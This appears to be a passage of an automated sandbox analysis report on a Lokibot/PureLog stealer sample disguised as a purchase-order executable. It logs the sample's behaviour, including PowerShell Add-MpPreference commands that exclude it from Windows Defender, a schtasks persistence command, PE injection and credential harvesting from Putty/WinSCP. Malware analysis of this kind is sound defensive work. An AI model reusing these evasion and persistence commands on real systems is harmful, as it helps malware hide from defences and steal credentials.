Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6856	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3480	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe TID: 6216	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe TID: 1468	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe	Jump to behavior

Source: PO-0Y9005373R664.exe, 00000009.00000002.2939793723.0000000001428000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: VvtddClQv.exe, 0000000E.00000002.1819713683.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe

Code function: 14_2_0040317B mov eax, dword ptr fs:[00000030h]

14_2_0040317B

Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe

Code function: 14_2_00402B7C GetProcessHeap,HeapAlloc,

14_2_00402B7C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe"
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VvtddClQv.exe"
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VvtddClQv.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Memory written: C:\Users\user\Desktop\PO-0Y9005373R664.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Memory written: C:\Users\user\AppData\Roaming\VvtddClQv.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VvtddClQv.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Users\user\Desktop\PO-0Y9005373R664.exe "C:\Users\user\Desktop\PO-0Y9005373R664.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process created: C:\Users\user\AppData\Roaming\VvtddClQv.exe "C:\Users\user\AppData\Roaming\VvtddClQv.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Queries volume information: C:\Users\user\Desktop\PO-0Y9005373R664.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Queries volume information: C:\Users\user\AppData\Roaming\VvtddClQv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-0Y9005373R664.exe PID: 6964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VvtddClQv.exe PID: 3788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VvtddClQv.exe PID: 4780, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000009.00000002.2939793723.0000000001428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-0Y9005373R664.exe PID: 2940, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: PO-0Y9005373R664.exe, type: SAMPLE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VvtddClQv.exe.29b9d20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.5500000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.PO-0Y9005373R664.exe.6c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1758190593.0000000005500000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1684307388.00000000006C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1745375841.0000000003B73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\VvtddClQv.exe, type: DROPPED

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

